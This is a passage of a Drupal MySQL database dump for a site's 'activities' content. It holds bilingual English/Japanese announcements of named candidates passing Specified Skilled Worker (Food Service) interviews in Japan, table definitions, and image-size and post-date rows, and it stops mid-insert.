('activities', 0, 195, 700, 'en', 0, '<p>Ms. Ei Ei Phyoe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 195, 700, 'ja', 0, '<p>EI EI PHYOE さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 196, 702, 'en', 0, '<p data-start=\"210\" data-end=\"328\"><strong data-start=\"210\" data-end=\"328\">Ms. Win Win Thu successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 196, 702, 'ja', 0, '<p data-start=\"1203\" data-end=\"1245\"><strong data-start=\"1203\" data-end=\"1245\">WIN WIN THU さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 197, 704, 'en', 0, '<p data-start=\"178\" data-end=\"300\"><strong data-start=\"178\" data-end=\"300\">Ms. Tun Eaindar Moe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 197, 704, 'ja', 0, '<p data-start=\"178\" data-end=\"300\"><strong data-start=\"178\" data-end=\"300\">TUN EAINDAR MOE さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 198, 706, 'en', 0, '<p>Ms. Mai Thandar Naing successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p>', '', 'full_html'),
('activities', 0, 198, 706, 'ja', 0, '<p>MAI THANDAR NAING さんが特定技能（外食業）の採用面接に合格されました。</p>', '', 'full_html'),
('activities', 0, 199, 708, 'en', 0, '<p data-start=\"172\" data-end=\"290\"><strong data-start=\"172\" data-end=\"290\">Ms. Ei Zin Htwe successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 199, 708, 'ja', 0, '<p data-start=\"172\" data-end=\"290\"><strong data-start=\"172\" data-end=\"290\">EI ZIN HTWE さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html'),
('activities', 0, 200, 710, 'en', 0, '<p data-start=\"187\" data-end=\"310\"><strong data-start=\"187\" data-end=\"310\">Ms. Htay Htay Khaing successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</strong></p>', '', 'full_html'),
('activities', 0, 200, 710, 'ja', 0, '<p data-start=\"187\" data-end=\"310\"><strong data-start=\"187\" data-end=\"310\">HTAY HTAY KHAING さんが特定技能（外食業）の採用面接に合格されました。</strong></p>', '', 'full_html');

-- --------------------------------------------------------

--
-- Table structure for table `node__field_activities_download_file`
--

CREATE TABLE `node__field_activities_download_file` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_activities_download_file_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_activities_download_file_display` tinyint UNSIGNED DEFAULT '1' COMMENT 'Flag to control whether this file should be displayed when viewing content.',
  `field_activities_download_file_description` text COMMENT 'A description of the file.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field field_activities_download_file.';

-- --------------------------------------------------------

--
-- Table structure for table `node__field_activities_img`
--

CREATE TABLE `node__field_activities_img` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_activities_img_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `field_activities_img_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_activities_img_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_activities_img_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_activities_img_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field field_activities_img.';

--
-- Dumping data for table `node__field_activities_img`
--

INSERT INTO `node__field_activities_img` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_activities_img_target_id`, `field_activities_img_alt`, `field_activities_img_title`, `field_activities_img_width`, `field_activities_img_height`) VALUES
('activities', 0, 6, 214, 'en', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 214, 'ja', 0, 11, '', '', 1280, 969),
('activities', 0, 6, 214, 'ko', 0, 11, '', '', 1280, 969),
('activities', 0, 7, 288, 'en', 0, 12, '', '', 499, 370),
('activities', 0, 7, 288, 'ja', 0, 12, '', '', 499, 370),
('activities', 0, 7, 288, 'ko', 0, 12, '', '', 499, 370),
('activities', 0, 8, 215, 'en', 0, 13, '', '', 460, 614),
('activities', 0, 8, 215, 'ja', 0, 13, '', '', 460, 614),
('activities', 0, 8, 215, 'ko', 0, 13, '', '', 460, 614),
('activities', 0, 9, 187, 'en', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 187, 'ja', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 187, 'ko', 0, 16, '', '', 1500, 1000),
('activities', 0, 17, 188, 'en', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 188, 'ja', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 188, 'ko', 0, 29, '', '', 1080, 810),
('activities', 0, 19, 186, 'en', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 186, 'ja', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 186, 'ko', 0, 30, '', '', 1080, 810),
('activities', 0, 20, 185, 'en', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 185, 'ja', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 185, 'ko', 0, 32, '', '', 1080, 810),
('activities', 0, 28, 220, 'en', 0, 81, '', '', 854, 451),
('activities', 0, 28, 220, 'ja', 0, 81, '', '', 854, 451),
('activities', 0, 28, 220, 'ko', 0, 81, '', '', 854, 451),
('activities', 0, 29, 223, 'en', 0, 83, '', '', 720, 540),
('activities', 0, 29, 223, 'ja', 0, 83, '', '', 720, 540),
('activities', 0, 29, 223, 'ko', 0, 83, '', '', 720, 540),
('activities', 0, 68, 424, 'en', 0, 361, '', '', 1600, 1200),
('activities', 0, 68, 424, 'ja', 0, 361, '', '', 1600, 1200),
('activities', 0, 70, 430, 'en', 0, 379, '', '', 885, 1600),
('activities', 0, 70, 430, 'ja', 0, 379, '', '', 885, 1600),
('activities', 0, 71, 431, 'en', 0, 381, '', '', 900, 1600),
('activities', 0, 71, 431, 'ja', 0, 381, '', '', 900, 1600),
('activities', 0, 72, 435, 'en', 0, 382, '', '', 885, 1600),
('activities', 0, 72, 435, 'ja', 0, 382, '', '', 885, 1600),
('activities', 0, 73, 439, 'en', 0, 388, '', '', 854, 641),
('activities', 0, 73, 439, 'ja', 0, 388, '', '', 854, 641),
('activities', 0, 74, 440, 'en', 0, 389, '', '', 885, 1600),
('activities', 0, 74, 440, 'ja', 0, 389, '', '', 885, 1600),
('activities', 0, 75, 448, 'en', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 448, 'ja', 0, 390, '', '', 900, 1600),
('activities', 0, 76, 447, 'en', 0, 395, '', '', 854, 641),
('activities', 0, 76, 447, 'ja', 0, 395, '', '', 854, 641),
('activities', 0, 77, 450, 'en', 0, 400, '', '', 1600, 1200),
('activities', 0, 77, 450, 'ja', 0, 400, '', '', 1600, 1200),
('activities', 0, 78, 452, 'en', 0, 407, '', '', 1600, 900),
('activities', 0, 78, 452, 'ja', 0, 407, '', '', 1600, 900),
('activities', 0, 79, 453, 'en', 0, 412, '', '', 1200, 1600),
('activities', 0, 80, 455, 'en', 0, 417, '', '', 1200, 1600),
('activities', 0, 80, 455, 'ja', 0, 417, '', '', 1200, 1600),
('activities', 0, 81, 457, 'en', 0, 419, '', '', 708, 1280),
('activities', 0, 81, 457, 'ja', 0, 419, '', '', 708, 1280),
('activities', 0, 82, 459, 'en', 0, 420, '', '', 900, 1600),
('activities', 0, 82, 459, 'ja', 0, 420, '', '', 900, 1600),
('activities', 0, 83, 464, 'en', 0, 423, '', '', 1314, 1080),
('activities', 0, 83, 464, 'ja', 0, 423, '', '', 1314, 1080),
('activities', 0, 84, 465, 'en', 0, 424, '', '', 900, 1600),
('activities', 0, 84, 465, 'ja', 0, 424, '', '', 900, 1600),
('activities', 0, 85, 463, 'en', 0, 426, '', '', 708, 1280),
('activities', 0, 85, 463, 'ja', 0, 426, '', '', 708, 1280),
('activities', 0, 86, 467, 'en', 0, 427, '', '', 1080, 1350),
('activities', 0, 86, 467, 'ja', 0, 427, '', '', 1080, 1350),
('activities', 0, 88, 471, 'en', 0, 428, '', '', 900, 504),
('activities', 0, 88, 471, 'ja', 0, 428, '', '', 900, 504),
('activities', 0, 89, 473, 'en', 0, 432, '', '', 1080, 711),
('activities', 0, 89, 473, 'ja', 0, 432, '', '', 1080, 711),
('activities', 0, 90, 478, 'en', 0, 433, '', '', 708, 1280),
('activities', 0, 90, 478, 'ja', 0, 433, '', '', 708, 1280),
('activities', 0, 91, 480, 'en', 0, 437, '', '', 900, 1600),
('activities', 0, 91, 480, 'ja', 0, 437, '', '', 900, 1600),
('activities', 0, 92, 482, 'en', 0, 440, '', '', 900, 1600),
('activities', 0, 92, 482, 'ja', 0, 440, '', '', 900, 1600),
('activities', 0, 93, 484, 'en', 0, 444, '', '', 1013, 1801),
('activities', 0, 93, 484, 'ja', 0, 444, '', '', 1013, 1801),
('activities', 0, 94, 485, 'en', 0, 447, '', '', 1013, 1801),
('activities', 0, 95, 524, 'en', 0, 466, '', '', 1600, 1205),
('activities', 0, 95, 524, 'ja', 0, 466, '', '', 1600, 1205),
('activities', 0, 96, 489, 'en', 0, 469, '', '', 1013, 1801),
('activities', 0, 96, 489, 'ja', 0, 469, '', '', 1013, 1801),
('activities', 0, 97, 491, 'en', 0, 470, '', '', 900, 1091),
('activities', 0, 97, 491, 'ja', 0, 470, '', '', 900, 1091),
('activities', 0, 98, 493, 'en', 0, 491, '', '', 960, 1280),
('activities', 0, 98, 493, 'ja', 0, 491, '', '', 960, 1280),
('activities', 0, 99, 495, 'en', 0, 492, '', '', 898, 1190),
('activities', 0, 99, 495, 'ja', 0, 492, '', '', 898, 1190),
('activities', 0, 100, 497, 'en', 0, 496, '', '', 591, 787),
('activities', 0, 100, 497, 'ja', 0, 496, '', '', 591, 787),
('activities', 0, 101, 499, 'en', 0, 498, '', '', 1080, 1920),
('activities', 0, 101, 499, 'ja', 0, 498, '', '', 1080, 1920),
('activities', 0, 102, 501, 'en', 0, 507, '', '', 300, 403),
('activities', 0, 102, 501, 'ja', 0, 507, '', '', 300, 403),
('activities', 0, 103, 505, 'en', 0, 508, '', '', 960, 758),
('activities', 0, 103, 505, 'ja', 0, 508, '', '', 960, 758),
('activities', 0, 104, 504, 'en', 0, 511, '', '', 390, 508),
('activities', 0, 104, 504, 'ja', 0, 511, '', '', 390, 508),
('activities', 0, 105, 507, 'en', 0, 512, '', '', 1080, 571),
('activities', 0, 105, 507, 'ja', 0, 512, '', '', 1080, 571),
('activities', 0, 106, 509, 'en', 0, 518, '', '', 1170, 1557),
('activities', 0, 106, 509, 'ja', 0, 518, '', '', 1170, 1557),
('activities', 0, 107, 511, 'en', 0, 520, '', '', 443, 561),
('activities', 0, 107, 511, 'ja', 0, 520, '', '', 443, 561),
('activities', 0, 108, 513, 'en', 0, 528, '', '', 1080, 1533),
('activities', 0, 108, 513, 'ja', 0, 528, '', '', 1080, 1533),
('activities', 0, 109, 515, 'en', 0, 530, '', '', 420, 540),
('activities', 0, 109, 515, 'ja', 0, 530, '', '', 420, 540),
('activities', 0, 110, 517, 'en', 0, 532, '', '', 1080, 1953),
('activities', 0, 110, 517, 'ja', 0, 532, '', '', 1080, 1953),
('activities', 0, 111, 519, 'en', 0, 538, '', '', 1080, 810),
('activities', 0, 111, 519, 'ja', 0, 538, '', '', 1080, 810),
('activities', 0, 112, 521, 'en', 0, 541, '', '', 854, 633),
('activities', 0, 112, 521, 'ja', 0, 541, '', '', 854, 633),
('activities', 0, 113, 523, 'en', 0, 546, '', '', 1080, 810),
('activities', 0, 113, 523, 'ja', 0, 546, '', '', 1080, 810),
('activities', 0, 114, 526, 'en', 0, 549, '', '', 900, 1600),
('activities', 0, 114, 526, 'ja', 0, 549, '', '', 900, 1600),
('activities', 0, 115, 528, 'en', 0, 554, '', '', 900, 1600),
('activities', 0, 115, 528, 'ja', 0, 554, '', '', 900, 1600),
('activities', 0, 116, 531, 'en', 0, 563, '', '', 960, 1280),
('activities', 0, 116, 531, 'ja', 0, 563, '', '', 960, 1280),
('activities', 0, 117, 532, 'en', 0, 565, '', '', 1080, 1953),
('activities', 0, 117, 532, 'ja', 0, 565, '', '', 1080, 1953),
('activities', 0, 118, 534, 'en', 0, 567, '', '', 526, 951),
('activities', 0, 118, 534, 'ja', 0, 567, '', '', 526, 951),
('activities', 0, 119, 537, 'en', 0, 569, '', '', 827, 826),
('activities', 0, 119, 537, 'ja', 0, 569, '', '', 827, 826),
('activities', 0, 120, 539, 'en', 0, 587, '', '', 1080, 487),
('activities', 0, 120, 539, 'ja', 0, 587, '', '', 1080, 487),
('activities', 0, 121, 541, 'en', 0, 590, '', '', 1080, 1953),
('activities', 0, 121, 541, 'ja', 0, 590, '', '', 1080, 1953),
('activities', 0, 122, 544, 'en', 0, 599, '', '', 854, 641),
('activities', 0, 122, 544, 'ja', 0, 599, '', '', 854, 641),
('activities', 0, 123, 545, 'en', 0, 602, '', '', 1080, 1953),
('activities', 0, 123, 545, 'ja', 0, 602, '', '', 1080, 1953),
('activities', 0, 124, 547, 'en', 0, 604, '', '', 1080, 1953),
('activities', 0, 124, 547, 'ja', 0, 604, '', '', 1080, 1953),
('activities', 0, 125, 549, 'en', 0, 607, '', '', 1080, 1953),
('activities', 0, 125, 549, 'ja', 0, 607, '', '', 1080, 1953),
('activities', 0, 126, 551, 'en', 0, 611, '', '', 1080, 810),
('activities', 0, 126, 551, 'ja', 0, 611, '', '', 1080, 810),
('activities', 0, 127, 553, 'en', 0, 615, '', '', 526, 951),
('activities', 0, 127, 553, 'ja', 0, 615, '', '', 526, 951),
('activities', 0, 128, 555, 'en', 0, 620, '', '', 1080, 1953),
('activities', 0, 128, 555, 'ja', 0, 620, '', '', 1080, 1953),
('activities', 0, 129, 557, 'en', 0, 624, '', '', 1080, 1953),
('activities', 0, 129, 557, 'ja', 0, 624, '', '', 1080, 1953),
('activities', 0, 130, 559, 'en', 0, 631, '', '', 1080, 1953),
('activities', 0, 130, 559, 'ja', 0, 631, '', '', 1080, 1953),
('activities', 0, 131, 561, 'en', 0, 633, '', '', 1080, 1953),
('activities', 0, 131, 561, 'ja', 0, 633, '', '', 1080, 1953),
('activities', 0, 132, 563, 'en', 0, 658, '', '', 900, 1600),
('activities', 0, 132, 563, 'ja', 0, 658, '', '', 900, 1600),
('activities', 0, 133, 565, 'en', 0, 669, '', '', 960, 1280),
('activities', 0, 133, 565, 'ja', 0, 669, '', '', 960, 1280),
('activities', 0, 134, 567, 'en', 0, 680, '', '', 483, 854),
('activities', 0, 134, 567, 'ja', 0, 680, '', '', 483, 854),
('activities', 0, 135, 569, 'en', 0, 690, '', '', 1080, 486),
('activities', 0, 135, 569, 'ja', 0, 690, '', '', 1080, 486),
('activities', 0, 136, 571, 'en', 0, 699, '', '', 1080, 608),
('activities', 0, 136, 571, 'ja', 0, 699, '', '', 1080, 608),
('activities', 0, 137, 573, 'en', 0, 703, '', '', 898, 1600),
('activities', 0, 137, 573, 'ja', 0, 703, '', '', 898, 1600),
('activities', 0, 138, 575, 'en', 0, 712, '', '', 854, 641),
('activities', 0, 138, 575, 'ja', 0, 712, '', '', 854, 641),
('activities', 0, 139, 577, 'en', 0, 715, '', '', 899, 1601),
('activities', 0, 139, 577, 'ja', 0, 715, '', '', 899, 1601),
('activities', 0, 140, 579, 'en', 0, 723, '', '', 1080, 810),
('activities', 0, 140, 579, 'ja', 0, 723, '', '', 1080, 810),
('activities', 0, 141, 581, 'en', 0, 727, '', '', 903, 1600),
('activities', 0, 141, 581, 'ja', 0, 727, '', '', 903, 1600),
('activities', 0, 142, 583, 'en', 0, 733, '', '', 1080, 813),
('activities', 0, 142, 583, 'ja', 0, 733, '', '', 1080, 813),
('activities', 0, 143, 585, 'en', 0, 736, '', '', 906, 1600),
('activities', 0, 143, 585, 'ja', 0, 736, '', '', 906, 1600),
('activities', 0, 144, 587, 'en', 0, 740, '', '', 899, 1600),
('activities', 0, 144, 587, 'ja', 0, 740, '', '', 899, 1600),
('activities', 0, 145, 589, 'en', 0, 742, '', '', 815, 790),
('activities', 0, 145, 589, 'ja', 0, 742, '', '', 815, 790),
('activities', 0, 146, 593, 'en', 0, 748, '', '', 708, 1280),
('activities', 0, 146, 593, 'ja', 0, 748, '', '', 708, 1280),
('activities', 0, 147, 595, 'en', 0, 759, '', '', 254, 207),
('activities', 0, 147, 595, 'ja', 0, 759, '', '', 254, 207),
('activities', 0, 148, 597, 'en', 0, 761, '', '', 1080, 1190),
('activities', 0, 148, 597, 'ja', 0, 761, '', '', 1080, 1190),
('activities', 0, 149, 598, 'en', 0, 765, '', '', 708, 1280),
('activities', 0, 150, 600, 'en', 0, 774, '', '', 1080, 813),
('activities', 0, 150, 600, 'ja', 0, 774, '', '', 1080, 813),
('activities', 0, 151, 602, 'en', 0, 776, '', '', 1013, 1801),
('activities', 0, 151, 602, 'ja', 0, 776, '', '', 1013, 1801),
('activities', 0, 152, 604, 'en', 0, 778, '', '', 1013, 1801),
('activities', 0, 152, 604, 'ja', 0, 778, '', '', 1013, 1801),
('activities', 0, 153, 606, 'en', 0, 785, '', '', 1263, 1800),
('activities', 0, 153, 606, 'ja', 0, 785, '', '', 1263, 1800),
('activities', 0, 154, 609, 'en', 0, 790, '', '', 1200, 1600),
('activities', 0, 154, 609, 'ja', 0, 790, '', '', 1200, 1600),
('activities', 0, 156, 613, 'en', 0, 795, '', '', 1200, 1600),
('activities', 0, 156, 613, 'ja', 0, 795, '', '', 1200, 1600),
('activities', 0, 157, 615, 'en', 0, 796, '', '', 1600, 1200),
('activities', 0, 157, 615, 'ja', 0, 796, '', '', 1600, 1200),
('activities', 0, 160, 660, 'en', 0, 847, '', '', 648, 908),
('activities', 0, 160, 660, 'ja', 0, 847, '', '', 648, 908),
('activities', 0, 161, 659, 'en', 0, 846, '', '', 648, 908),
('activities', 0, 161, 659, 'ja', 0, 846, '', '', 648, 908),
('activities', 0, 164, 629, 'en', 0, 807, '', '', 1200, 1600),
('activities', 0, 164, 629, 'ja', 0, 807, '', '', 1200, 1600),
('activities', 0, 165, 631, 'en', 0, 809, '', '', 1600, 1200),
('activities', 0, 165, 631, 'ja', 0, 809, '', '', 1600, 1200),
('activities', 0, 166, 634, 'en', 0, 816, '', '', 1052, 1452),
('activities', 0, 166, 634, 'ja', 0, 816, '', '', 1052, 1452),
('activities', 0, 167, 636, 'en', 0, 817, '', '', 854, 641),
('activities', 0, 167, 636, 'ja', 0, 817, '', '', 854, 641),
('activities', 0, 168, 638, 'en', 0, 819, '', '', 1038, 1402),
('activities', 0, 168, 638, 'ja', 0, 819, '', '', 1038, 1402),
('activities', 0, 169, 640, 'en', 0, 820, '', '', 1205, 1601),
('activities', 0, 169, 640, 'ja', 0, 820, '', '', 1205, 1601),
('activities', 0, 170, 642, 'en', 0, 822, '', '', 1600, 1237),
('activities', 0, 170, 642, 'ja', 0, 822, '', '', 1600, 1237),
('activities', 0, 171, 644, 'en', 0, 825, '', '', 1200, 1600),
('activities', 0, 171, 644, 'ja', 0, 825, '', '', 1200, 1600),
('activities', 0, 173, 648, 'en', 0, 830, '', '', 1280, 960),
('activities', 0, 173, 648, 'ja', 0, 830, '', '', 1280, 960),
('activities', 0, 174, 650, 'en', 0, 834, '', '', 1203, 1600),
('activities', 0, 174, 650, 'ja', 0, 834, '', '', 1203, 1600),
('activities', 0, 175, 652, 'en', 0, 837, '', '', 720, 1280),
('activities', 0, 175, 652, 'ja', 0, 837, '', '', 720, 1280),
('activities', 0, 176, 654, 'en', 0, 840, '', '', 1600, 1200),
('activities', 0, 176, 654, 'ja', 0, 840, '', '', 1600, 1200),
('activities', 0, 177, 656, 'en', 0, 843, '', '', 1080, 1440),
('activities', 0, 177, 656, 'ja', 0, 843, '', '', 1080, 1440),
('activities', 0, 178, 662, 'en', 0, 848, '', '', 1600, 1240),
('activities', 0, 178, 662, 'ja', 0, 848, '', '', 1600, 1240),
('activities', 0, 179, 664, 'en', 0, 849, '', '', 648, 908),
('activities', 0, 179, 664, 'ja', 0, 849, '', '', 648, 908),
('activities', 0, 180, 667, 'en', 0, 850, '', '', 648, 908),
('activities', 0, 180, 667, 'ja', 0, 850, '', '', 648, 908),
('activities', 0, 181, 669, 'en', 0, 851, '', '', 709, 945),
('activities', 0, 181, 669, 'ja', 0, 851, '', '', 709, 945),
('activities', 0, 182, 671, 'en', 0, 852, '', '', 330, 390),
('activities', 0, 182, 671, 'ja', 0, 852, '', '', 330, 390),
('activities', 0, 183, 673, 'en', 0, 853, '', '', 1166, 1600),
('activities', 0, 183, 673, 'ja', 0, 853, '', '', 1166, 1600),
('activities', 0, 184, 675, 'en', 0, 854, '', '', 1200, 1600),
('activities', 0, 184, 675, 'ja', 0, 854, '', '', 1200, 1600),
('activities', 0, 185, 678, 'en', 0, 855, '', '', 648, 906),
('activities', 0, 185, 678, 'ja', 0, 855, '', '', 648, 906),
('activities', 0, 186, 680, 'en', 0, 856, '', '', 648, 906),
('activities', 0, 186, 680, 'ja', 0, 856, '', '', 648, 906),
('activities', 0, 187, 682, 'en', 0, 857, '', '', 648, 906),
('activities', 0, 187, 682, 'ja', 0, 857, '', '', 648, 906),
('activities', 0, 189, 686, 'en', 0, 858, '', '', 648, 906),
('activities', 0, 189, 686, 'ja', 0, 858, '', '', 648, 906),
('activities', 0, 190, 689, 'en', 0, 859, '', '', 648, 906),
('activities', 0, 190, 689, 'ja', 0, 859, '', '', 648, 906),
('activities', 0, 191, 691, 'en', 0, 860, '', '', 648, 906),
('activities', 0, 191, 691, 'ja', 0, 860, '', '', 648, 906),
('activities', 0, 192, 693, 'en', 0, 861, '', '', 648, 906),
('activities', 0, 192, 693, 'ja', 0, 861, '', '', 648, 906),
('activities', 0, 193, 696, 'en', 0, 862, '', '', 648, 906),
('activities', 0, 193, 696, 'ja', 0, 862, '', '', 648, 906),
('activities', 0, 195, 700, 'en', 0, 863, '', '', 648, 906),
('activities', 0, 195, 700, 'ja', 0, 863, '', '', 648, 906),
('activities', 0, 196, 702, 'en', 0, 864, '', '', 648, 906),
('activities', 0, 196, 702, 'ja', 0, 864, '', '', 648, 906),
('activities', 0, 197, 704, 'en', 0, 865, '', '', 648, 906),
('activities', 0, 197, 704, 'ja', 0, 865, '', '', 648, 906),
('activities', 0, 198, 706, 'en', 0, 866, '', '', 648, 906),
('activities', 0, 198, 706, 'ja', 0, 866, '', '', 648, 906),
('activities', 0, 199, 708, 'en', 0, 867, '', '', 1133, 1600),
('activities', 0, 199, 708, 'ja', 0, 867, '', '', 1133, 1600),
('activities', 0, 200, 710, 'en', 0, 868, '', '', 872, 1212),
('activities', 0, 200, 710, 'ja', 0, 868, '', '', 872, 1212);

-- --------------------------------------------------------

--
-- Table structure for table `node__field_activities_post_date`
--

CREATE TABLE `node__field_activities_post_date` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_activities_post_date_value` varchar(20) NOT NULL COMMENT 'The date value.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for node field field_activities_post_date.';

--
-- Dumping data for table `node__field_activities_post_date`
--

INSERT INTO `node__field_activities_post_date` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `field_activities_post_date_value`) VALUES
('activities', 0, 6, 214, 'en', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 214, 'ja', 0, '2023-06-03T04:43:54'),
('activities', 0, 6, 214, 'ko', 0, '2023-06-03T04:43:54'),
('activities', 0, 7, 288, 'en', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 288, 'ja', 0, '2023-05-17T18:00:50'),
('activities', 0, 7, 288, 'ko', 0, '2023-05-17T18:00:50'),
('activities', 0, 8, 215, 'en', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 215, 'ja', 0, '2023-05-25T18:06:55'),
('activities', 0, 8, 215, 'ko', 0, '2023-05-25T18:06:55'),
('activities', 0, 9, 187, 'en', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 187, 'ja', 0, '2023-06-02T18:13:21'),
('activities', 0, 9, 187, 'ko', 0, '2023-06-02T18:13:21'),
('activities', 0, 17, 188, 'en', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 188, 'ja', 0, '2023-06-03T03:01:57'),
('activities', 0, 17, 188, 'ko', 0, '2023-06-03T03:01:57'),
('activities', 0, 19, 186, 'en', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 186, 'ja', 0, '2023-06-14T02:39:46'),
('activities', 0, 19, 186, 'ko', 0, '2023-06-14T02:39:46'),
('activities', 0, 20, 185, 'en', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 185, 'ja', 0, '2023-06-19T02:39:37'),
('activities', 0, 20, 185, 'ko', 0, '2023-06-19T02:39:37'),
('activities', 0, 28, 220, 'en', 0, '2023-07-08T02:59:26'),
('activities', 0, 28, 220, 'ja', 0, '2023-07-08T02:59:26'),
('activities', 0, 28, 220, 'ko', 0, '2023-07-08T02:59:26'),
('activities', 0, 29, 223, 'en', 0, '2023-07-08T04:13:16'),
('activities', 0, 29, 223, 'ja', 0, '2023-07-08T04:13:16'),
('activities', 0, 29, 223, 'ko', 0, '2023-07-08T04:13:16'),
('activities', 0, 67, 421, 'ja', 0, '2024-02-06T04:44:02'),
('activities', 0, 68, 424, 'en', 0, '2024-04-22T02:30:00'),
('activities', 0, 68, 424, 'ja', 0, '2024-04-22T02:30:00'),
('activities', 0, 69, 426, 'en', 0, '2024-04-09T02:30:00'),
('activities', 0, 69, 426, 'ja', 0, '2024-04-09T02:30:00'),
('activities', 0, 71, 431, 'en', 0, '2024-05-20T14:30:00'),
('activities', 0, 71, 431, 'ja', 0, '2024-05-20T14:30:00'),
('activities', 0, 72, 435, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 72, 435, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 73, 439, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 73, 439, 'ja', 0, '2024-05-19T02:30:00'),
('activities', 0, 74, 440, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 74, 440, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 448, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 75, 448, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 76, 447, 'en', 0, '2024-05-19T02:30:00'),
('activities', 0, 76, 447, 'ja', 0, '2024-05-19T02:30:00'),
('activities', 0, 77, 450, 'en', 0, '2024-06-25T02:30:00'),
('activities', 0, 77, 450, 'ja', 0, '2024-06-25T02:30:00'),
('activities', 0, 78, 452, 'en', 0, '2024-06-13T02:30:00'),
('activities', 0, 78, 452, 'ja', 0, '2024-06-13T02:30:00'),
('activities', 0, 79, 453, 'en', 0, '2024-06-02T02:30:00'),
('activities', 0, 80, 455, 'en', 0, '2024-06-02T02:30:00'),
('activities', 0, 80, 455, 'ja', 0, '2024-06-02T02:30:00'),
('activities', 0, 81, 457, 'en', 0, '2024-06-04T02:30:00'),
('activities', 0, 81, 457, 'ja', 0, '2024-06-04T02:30:00'),
('activities', 0, 82, 459, 'en', 0, '2024-05-20T02:30:00'),
('activities', 0, 82, 459, 'ja', 0, '2024-05-20T02:30:00'),
('activities', 0, 83, 464, 'en', 0, '2024-11-06T02:38:25'),
('activities', 0, 83, 464, 'ja', 0, '2024-11-06T02:38:25'),
('activities', 0, 84, 465, 'en', 0, '2024-05-29T14:30:00'),
